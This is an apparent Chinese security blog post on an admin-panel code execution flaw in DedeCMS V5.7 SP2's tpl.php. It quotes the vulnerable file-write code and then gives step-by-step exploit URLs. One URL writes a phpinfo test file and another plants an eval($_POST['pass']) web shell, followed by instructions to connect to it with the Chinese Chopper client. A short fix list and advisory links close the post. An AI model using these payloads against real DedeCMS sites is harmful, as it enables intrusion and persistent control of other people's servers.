DedeCMS V5.7 SP2后台代码执行漏洞拿webshell
in 技术文章 with 0 comment

DedeCMS V5.7 SP2后台代码执行漏洞拿webshell

in 技术文章 with 0 comment

漏洞详情

织梦默认的后台地址是/dede/,当然也可以被更改,到时候根据网站具体情况替换默认后台地址即可。

dede/tpl.php 中第251行到281行

csrf_check();
if(!preg_match("#^[a-z0-9_-]{1,}\.lib\.php$#i", $filename))
{
    ShowMsg('文件名不合法,不允许进行操作!', '-1');
    exit();
}
require_once(DEDEINC.'/oxwindow.class.php');
$tagname = preg_replace("#\.lib\.php$#i", "", $filename);
$content = stripslashes($content);
$truefile = DEDEINC.'/taglib/'.$filename;
$fp = fopen($truefile, 'w');
fwrite($fp, $content);
fclose($fp);

由于dedecms全局变量注册的特性,所以这里的content变量和filename变量可控。
可以看到将content直接写入到文件中导致可以getshell。但是这里的文件名经过正则表达式,所以必须要.lib.php结尾。

注意: 这里还有一个csrf_check()函数,即请求中必须要带token参数。

漏洞利用

先获取token,访问/dede/tpl.php?action=upload
查看源代码 取得token

1

然后构造访问:

域名/后台/tpl.php?filename=moonsec.lib.php&action=savetagfile&content=%3C?php%20phpinfo();?%3E&token=[你的token值

得到shell:

域名/include/taglib/moonsec.lib.php

2

getshell:

域名/后台/tpl.php?filename=tuifeiseo.lib.php&action=savetagfile&content=%3C?php%20eval($_POST['pass'])?%3E&token=token值

成功是这样:

20180602012825.jpg

菜刀连接:

http://网址/include/taglib/tuifeiseo.lib.php

密码:pass
20180602012756.jpg

漏洞修复

  1. 禁止此处写入文件。
  2. 过滤恶意标签

参考链接

http://www.cnvd.org.cn/flaw/show/CNVD-2018-01221
http://www.freebuf.com/vuls/164035.html

Responses